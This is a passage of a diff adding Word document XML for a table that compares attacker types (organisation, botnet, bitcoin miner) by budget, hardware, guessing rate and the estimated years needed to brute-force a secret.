+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>1.128 x 10^25 days</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Or</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>3.08 x 10^22 years</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>​</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+            <w:tr>
+              <w:trPr>
+                <w:trHeight w:val="302"/>
+                <w:tblCellSpacing w:w="15" w:type="dxa"/>
+              </w:trPr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Large Organisation</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>$</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>2</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>M</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="1695" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>:2x</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>AMD EPYC™ 9355 Processor 32-core</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve"> (64 Thread)</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve"> 3.55GHz 256MB Cache (280W)</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>I</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve">mplemented in a Server Rack </w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2044" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>9.813 x 10^13 bits per day</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2724" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve">3.4669 x 10^24 days </w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve">Or </w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>9.848 x 10^21</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve"> years</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+            <w:tr>
+              <w:trPr>
+                <w:trHeight w:val="312"/>
+                <w:tblCellSpacing w:w="15" w:type="dxa"/>
+              </w:trPr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Large botnet</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>$25M</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="1695" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>AMD Ryzen 5 5600x 6 Cores</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve"> (4.7GHz)</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>5 Million Devices</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2044" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>3.384 x 10^18</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve"> bits per day</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2724" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve">1.005 x 10^20 days </w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Or</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>2.753 x 10 ^17 years</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+            <w:tr>
+              <w:trPr>
+                <w:trHeight w:val="616"/>
+                <w:tblCellSpacing w:w="15" w:type="dxa"/>
+              </w:trPr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:lastRenderedPageBreak/>
+                    <w:t>Professional bitcoin miner</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
